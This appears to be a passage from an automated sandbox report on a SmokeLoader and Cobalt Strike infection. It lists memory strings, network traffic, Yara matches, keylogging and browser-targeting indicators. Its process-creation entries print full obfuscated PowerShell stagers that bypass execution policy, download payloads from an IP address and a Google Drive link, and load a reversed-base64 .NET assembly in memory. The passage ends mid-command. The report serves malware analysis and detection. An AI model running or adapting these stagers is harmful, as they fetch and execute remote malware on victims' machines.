Source: explorer.exe, 0000000E.00000003.2159660741.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcemberZ
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000003.2159424837.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.0000000009730000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com576
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49778 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 30_2_0015162B GetKeyboardState,ToUnicode,

30_2_0015162B

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\SysWOW64\explorer.exe	Code function: StrStrIA, chrome.exe\|opera.exe\|msedge.exe	22_2_02C22EA8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe	22_2_02C23862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe	22_2_02C23862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe	22_2_02C23862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe	22_2_02C23862

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, 